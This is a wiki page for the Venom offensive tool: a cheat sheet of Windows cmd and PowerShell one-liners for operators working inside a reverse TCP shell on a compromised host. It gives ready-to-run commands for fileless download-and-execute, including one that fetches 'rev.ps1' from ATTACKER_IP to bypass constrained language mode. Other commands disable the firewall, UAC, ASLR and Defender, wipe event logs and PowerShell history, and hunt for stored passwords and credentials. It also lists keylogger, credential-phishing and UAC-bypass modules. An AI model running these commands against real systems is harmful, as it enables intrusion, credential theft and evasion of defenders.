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CmdLine & Scripts for reverse TCP shell addicts
pedro ubuntu edited this page Feb 2, 2021
172 revisions
This WIKI describes some of the available cmdline(s) & Scripts that can be executed directly in our reverse tcp shell prompt
to help pentesters (red teams) in there enumeration tasks or to perform simple remote host shell functions ( onelinners ).
Venom v1.0.17.7 release replaced the xterm
terminal by gnome-terminal
because xterm does not allow users to copy/paste.
[1] - Enumeration
[2] - NetWork
[3] - FileSystem
[4] - Credentials
[5] - Auxiliary-Modules
Description | Privileges | Interpreter | LolBin |
target host enumeration | ๐ถ UserLand | cmd or powershell | systeminfo |
systeminfo|findstr "Host OS Type"
Description | Privileges | Interpreter |
Get current username | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
List Host Accounts | ๐ถ UserLand | powershell |
Get-LocalUser|Select-Object Name,Enabled,Description
Description | Privileges | Interpreter |
List last logon | ๐ถ UserLand | powershell |
Get-LocalUser|ft Name,Enabled,LastLogon
Description | Privileges | Interpreter |
Get current process PID | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
Get current process PID | ๐ถ UserLand | powershell |
(Get-Process -PID $PID).Id
Description | Privileges | Interpreter | Storage |
Capture desktop screenshot and save to TMP (FileLess) | ๐ถ UserLand | powershell | FileLess + $Env:TMP (screenshots) |
Description | Privileges | Interpreter | LolBin | Storage |
Capture screenshots of mouseclicks for 4 seconds | ๐ถ UserLand | powershell | psr.exe | $Env:TMP (SHot.zip) |
psr.exe /start /output $Env:TMP\SHot.zip /sc 1 /gui 0;Start-Sleep -Seconds 4;psr.exe /stop
Description | Privileges | Interpreter |
List Host Schedule Tasks | ๐ถ UserLand | cmd or powershell |
cmd /c schtasks|findstr "Ready Running"
Description | Privileges | Interpreter |
List Host Process(s) Running | ๐ถ UserLand | powershell |
Get-Process|Select-Object Name,Path,Company,Product,StartTime
Description | Privileges | Interpreter |
List Host Process(s) Running | ๐ถ UserLand | cmd or powershell |
cmd /c tasklist /SVC
Description | Privileges | Interpreter |
List Host Process(s) Running with CanStop True | ๐ถ UserLand | powershell |
Get-Service|Select-Object CanStop,Status,Name,DisplayName|Where { $_.Status -iMatch 'Running' -and $_.CanStop -ieq 'True' }
Description | Privileges | Interpreter |
List Host Process(s) Running with StartType automatic | ๐ถ UserLand | powershell |
Get-Service|Select-Object Status,StartType,Name,DisplayName|Where { $_.Status -iMatch 'Running' -and $_.StartType -iMatch 'automatic' }
Description | Privileges | Interpreter |
Stop remote process(s) by FileName | ๐ถ UserLand | cmd or powershell |
cmd /c Taskkill /F /IM Python.exe
Description | Privileges | Interpreter |
Stop remote process(s) by PID Number | ๐ถ UserLand | cmd or powershell |
cmd /c Taskkill /F /PID 1234
Description | Privileges | Interpreter |
List Host Applications Installed. | ๐ถ UserLand | powershell |
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |Select-Object DisplayName, DisplayVersion|Format-Table -AutoSize
Description | Privileges | Interpreter |
List Powershell History | ๐ถ UserLand | powershell |
type $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Description | Privileges | Interpreter |
Anti-Virus Enumeration | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
Enumerate protections | ๐ถ UserLand | powershell |
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Description | Privileges | Interpreter |
List established connections | ๐ถ UserLand | cmd or powershell |
cmd /c netstat -ano|findstr "ESTABLISHED"
Description | Privileges | Interpreter |
List established connections | ๐ถ UserLand | powershell |
Get-NetTcpConnection -State "Established"|Format-Table -AutoSize
Description | Privileges | Interpreter | LolBin |
Start firefox browser in sellected url | ๐ถ UserLand | cmd or powershell | firefox.exe |
cmd /c start firefox.exe https://www.bing.com/search?q=hacking
Description | Privileges | Interpreter | LolBin |
Start webserver in current directory | ๐ถ UserLand | cmd or powershell | python.exe |
python -m http.server --bind 8080
Description | Privileges | Interpreter | Storage |
Download cmdlet to target machine and exec (FileLess) | ๐ถ UserLand | powershell | FileLess |
Description | Privileges | Interpreter | Storage |
Download cmdlet to target machine | ๐ถ UserLand | powershell | $Env:TMP |
iwr -Uri -OutFile $env:tmp\webserver.ps1
Description | Privileges | Interpreter | LolBin | Storage |
Download cmdlet to target machine and exec (FileLess) | ๐ถ UserLand | powershell | Msxml2.XMLHTTP | FileLess |
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','',$false);$h.send();iex $h.responseText
Description | Privileges | Interpreter |
List target host Interfaces | ๐ถ UserLand | powershell |
Get-NetIPConfiguration|ft InterfaceAlias,InterfaceDescription,IPv4Address
Description | Privileges | Interpreter | LolBin |
Fetch HTML headers | ๐ถ UserLand | cmd or powershell | curl.exe |
cmd /c curl --head "https://example.com"
Description | Privileges | Interpreter | LolBin |
List contents of remote directory | ๐ถ UserLand | cmd or powershell | curl.exe |
cmd /c curl --list-only "https://example.com/foo/"
Description | Privileges | Interpreter |
List Host DNS Cache Entrys | ๐ถ UserLand | cmd or powershell |
cmd /c ipconfig /displaydns|findstr /C:"Record Name" /C:"A (Host) Record"
Description | Privileges | Interpreter |
List Host DNS Cache Entrys | ๐ถ UserLand | Wmi + powershell |
Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop|Select-Object Entry,Name,Data|Format-Table -Wrap|Out-String
Description | Privileges | Interpreter |
List Host DNS Cache Entrys | ๐ถ UserLand | powershell |
Get-DNSClientCache|Select-Object Entry,Data|Format-Table -AutoSize
Description | Privileges | Interpreter | LolBin |
List firewall rules | ๐ถ UserLand | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall show allprofiles
Description | Privileges | Interpreter | LolBin |
List firewall rules | ๐ถ UserLand | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall show currentprofile
Description | Privileges | Interpreter | LolBin |
List firewall rules | ๐ถ UserLand | powershell | null |
Get-NetFirewallRule -All
Description | Privileges | Interpreter | LolBin |
Filter firewall ruleName | ๐ถ UserLand | powershell | null |
Get-NetFirewallRule|Where { $_.DisplayName -eq 'python.exe' }|Select-Object DisplayName,Description,Enabled,Profile,Direction,Action|Format-Table -AutoSize
Description | Privileges | Interpreter |
List SMB shares | ๐ถ UserLand | powershell |
Get-SmbShare|Select-Object Name,Path,Description
Description | Privileges | Interpreter |
Get browser User Agent | ๐ถ UserLand | powershell |
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\internet settings" -Name 'User Agent' -ErrorAction SilentlyContinue|Select-Object 'User Agent'
Description | Privileges | Interpreter | LolBin |
Stop remote firewall | ๐ Administrator | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall set allprofiles state off
Description | Privileges | Interpreter | LolBin |
Start remote firewall | ๐ Administrator | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall set allprofiles state on
Description | Privileges | Interpreter | LolBin |
Add Rule to firewall | ๐ Administrator | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall firewall add rule name="Mine Webserver" dir=in action=allow protocol=TCP localport=8080
Description | Privileges | Interpreter | LolBin |
Add Rule to firewall | ๐ Administrator | cmd or powershell | netsh.exe |
netsh advfirewall firewall add rule name="Mine Webserver" description="venom v1.0.17 - python (SE) webserver" program="$Env:LOCALAPPDATA\Programs\python.exe" dir=in action=allow protocol=TCP enable=yes
Description | Privileges | Interpreter | LolBin |
Delete Rule from firewall | ๐ Administrator | cmd or powershell | netsh.exe |
cmd /c netsh advfirewall firewall delete rule name="Mine Webserver"
Description | Privileges | Interpreter |
Delete Rule from firewall | ๐ Administrator | powershell |
Remove-NetFirewallRule -DisplayName "Mine Webserver"
Description | Privileges | Interpreter | LolBin |
Review firewall rule (Name) | ๐ Administrator | cmd or powershell | netsh.exe |
netsh advfirewall firewall show rule name="Mine Webserver"
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Description | Privileges | Interpreter |
Print Working Directory | ๐ถ UserLand | cmd or powershell |
Description | Privileges | Interpreter |
Hidde file with 'system' attribute | ๐ถ UserLand | cmd or powershell |
cmd /c attrib +H +S C:\path\to\your\file.doc
Description | Privileges | Interpreter |
Un-Hidde file with 'system' attribute | ๐ถ UserLand | cmd or powershell |
cmd /c attrib -H -S C:\path\to\your\file.doc
Description | Privileges | Interpreter |
List hidden files recursive | ๐ถ UserLand | cmd or powershell |
cmd /c dir %USERPROFILE% /A:H /S /B
Description | Privileges | Interpreter |
List ADS (Alternate Data Streams) entrys | ๐ถ UserLand | cmd or powershell |
cmd /c dir /r
Description | Privileges | Interpreter |
List all event logs | ๐ถ UserLand | powershell |
Get-EventLog -List
Description | Privileges | Interpreter |
Read FileName.txt text file on terminal (PS) | ๐ถ UserLand | powershell |
Get-Content FileName.tx
Description | Privileges | Interpreter |
Read FileName.txt text file on terminal (PS) | ๐ถ UserLand | cmd or powershell |
cmd /c type FileName.txt
Description | Privileges | Interpreter |
List startup entrys | ๐ถ UserLand | powershell |
Get-CimInstance Win32_StartupCommand|Select-Object Name,Command,Location,User
Description | Privileges | Interpreter |
List last 10 system eventlogs | ๐ถ UserLand | powershell |
Get-EventLog -LogName "System" -newest 10
Description | Privileges | Interpreter |
List last 10 security eventlogs | ๐ Administrator | powershell |
Get-EventLog -LogName "Security" -newest 10
Description | Privileges | Interpreter |
List last 10 Powershell eventlogs | ๐ถ UserLand | powershell |
Get-EventLog -LogName "Windows Powershell" -newest 10
Description | Privileges | Interpreter |
List Installed Software | ๐ถ UserLand | powershell |
Get-ChildItem "C:\Program Files", "C:\Program Files (x86)"|ft Parent,Name,LastWriteTime
Description | Privileges | Interpreter |
Shutdown remote pc in 10 seconds | ๐ถ UserLand | cmd or powershell |
cmd /R shutdown /r /c "my shutdown msg" /t 10
Description | Privileges | Interpreter |
List Recycle Bin entrys | ๐ถ UserLand | powershell |
$shell = New-Object -com shell.application;$rb = $shell.Namespace(10);$rb.Items()
Description | Privileges | Interpreter |
List Host Drives Available | ๐ถ UserLand | powershell |
Get-PSDrive -PSProvider 'FileSystem'|Select-Object Name,Used,Free,Root|Format-Table
Description | Privileges | Interpreter |
Hidde Drives from explorer | ๐ Administrator | cmd or powershell |
cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
Description | Privileges | Interpreter |
Show Drives on explorer | ๐ Administrator | powershell |
Remove-Itemproperty -path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\Explorer' -Name 'NoDrives' -Force;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
Description | Privileges | Interpreter |
Clear windows event logs | ๐ Administrator | powershell |
wevtutil el|Foreach-Object {wevtutil cl "$_"}
Description | Privileges | Interpreter |
Disable remote UAC | ๐ Administrator | powershell |
Set-Itemproperty -path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system' -Name 'EnableLUA' -value 0 -Force
Description | Privileges | Interpreter |
Disable remote ASLR | ๐ Administrator | powershell |
Set-Itemproperty -path 'HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' -Name 'MoveImages' -value 0 -Force
Description | Privileges | Interpreter |
Disable Task Manager | ๐ Administrator | cmd or powershell |
cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
Description | Privileges | Interpreter |
Enable Task Manager | ๐ Administrator | cmd or powershell |
cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t REG_DWORD /d 0 /f;cmd /c taskkill /F /IM explorer.exe;start explorer.exe
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Description | Privileges | Interpreter |
List User Tokens | ๐ถ UserLand | cmd or powershell |
whoami /priv
Description | Privileges | Interpreter |
List stored credentials | ๐ถ UserLand | cmd or powershell |
cmdkey /list
Description | Privileges | Interpreter |
Verify If You Are in Constrained Mode | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
List Host Groups Available (SID) | ๐ถ UserLand | powershell |
Get-LocalUser|Select-Object -Property Name,SID,Enabled,PasswordRequired,LastLogon|ft
Description | Privileges | Interpreter | LolBin | Author |
Find missing software patchs for Privilege Escalation | ๐ถ UserLand | powershell | iwr | @rasta-mouse |
(Find-AllVulns(iwr https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/sherlock.ps1))
Description | Privileges | Interpreter |
List Host Folder Permissions | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
List Host Folder Permissions | ๐ถ UserLand | cmd |
Description | Privileges | Interpreter |
List folders with 'Everyone' Permissions | ๐ถ UserLand | powershell |
Get-ChildItem "C:\Program Files*", "C:\Program Files (x86)*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}}
Description | Privileges | Interpreter |
List Host Unquoted Service Paths. | ๐ถ UserLand | powershell |
gwmi -class Win32_Service -Property Name,DisplayName,PathName,StartMode|Where {$_.StartMode -eq "Auto" -and $_.PathName -NotLike "C:\Windows\*" -and $_.PathName -NotMatch '"*"'}|Select PathName,Name
Description | Privileges | Interpreter |
List Folder(s) Weak Permissions Recursive. | ๐ถ UserLand | cmd + powershell |
icacls $env:programfiles\* > $env:tmp\WeakDirs.txt;$check_ACL = get-content $env:tmp\WeakDirs.txt|findstr /I /C:"Everyone:"|findstr "(F) (R) (W)";If($check_ACL){Get-Content $env:tmp\WeakDirs.txt;remove-item $env:tmp\WeakDirs.txt -Force}
Description | Privileges | Interpreter |
Search for Rotten Potato Vulnerability. | ๐ถ UserLand | cmd + powershell |
cmd /R whoami /priv|findstr /i /C:"SeImpersonatePrivilege" /C:"SeAssignPrimaryPrivilege" /C:"SeTcbPrivilege" /C:"SeBackupPrivilege" /C:"SeRestorePrivilege" /C:"SeCreateTokenPrivilege" /C:"SeLoadDriverPrivilege" /C:"SeTakeOwnershipPrivilege" /C:"SeDebugPrivileges" > dellog.txt;$check_ACL = get-content dellog.txt|findstr /i /C:"Enabled";If($check_ACL){echo "[i] Rotten Potato Vulnerable Settings Found [Enabled] ..`n" > test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Get-Content dellog.txt;remove-item dellog.txt -Force}Else{echo "[i] Rotten Potato not found in current system .."}
Description | Privileges | Interpreter |
Check reverse tcp shell privileges | ๐ถ UserLand | powershell |
$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");If($IsClientAdmin){echo "[i] Running under Administrator Privileges .."}Else{write-host "[i] Running under UserLand Privileges .."}
Description | Privileges | Interpreter |
Search for paswords inside text (txt) or log (log) files recursive | ๐ถ UserLand | cmd + powershell |
cd $Env:USERPROFILE|findstr /s /I "passw" *.txt *.log >> $Env:TMP\passwd.txt;cd $Env:USERPROFILE|findstr /s /I "login" *.txt *.log >> $Env:TMP\passwd.txt;Get-Content $Env:TMP\passwd.txt;Remove-Item $Env:TMP\passwd.txt -Force
Description | Privileges | Interpreter |
Powershell Constrained Language Bypass | ๐ถ UserLand | powershell |
powershell -v 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
Description | Privileges | Interpreter |
Disable AV Real time Monitoring | ๐ถ UserLand | powershell |
Set-MpPreference -DisableRealtimeMonitoring $True; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true
Description | Privileges | Interpreter |
Disable PowerShell command logging for current session (open shell) | ๐ถ UserLand | powershell |
Set-PSReadlineOption โHistorySaveStyle SaveNothing
Description | Privileges | Interpreter |
List Powershell Options | ๐ถ UserLand | powershell |
Description | Privileges | Interpreter |
Clear PowerShell command logging | ๐ถ UserLand | powershell |
$CleanTracks = (Get-PSReadlineOption).HistorySavePath;echo "null" > $CleanTracks
Description | Privileges | Interpreter |
List execution policy | ๐ถ UserLand | powerhell |
Get-ExecutionPolicy -List
Description | Privileges | Interpreter |
Change execution policy for this session | ๐ถ UserLand | powershell |
Set-ExecutionPolicy Bypass -Scope Process
Description | Privileges | Interpreter |
Change execution policy (sillent) | ๐ถ UserLand | cmd or powerhell |
cmd /R echo Y | powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser
Description | Privileges | Interpreter | LolBin |
List security updates installed | ๐ถ UserLand | cmd or powerhell | Wmic |
wmic qfe get Hotfixid,installedon,description,installedby
Description | Operative system |
World Writable Folders | Default on Windows 10 1803 |
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Module | Description |
GetBrowsers.ps1 | Enumerate remote host browsers (Home Page, All Browsers Versions, Accepted Language Download Directory, History, Bookmarks, Extentions, Start Page, Stored Creds, User-Agent, logins stored.) |
CredsPhish.ps1 | Standalone Powershell script that will promp the current user for a valid credential. |
CompDefault.ps1 | UAC bypass module or to execute one command with high privileges (Admin) |
keylooger.ps1 | Standalone Powershell Script to Capture keyboard keystrokes |
webserver.ps1 | CmdLet to download files from compromissed PC |
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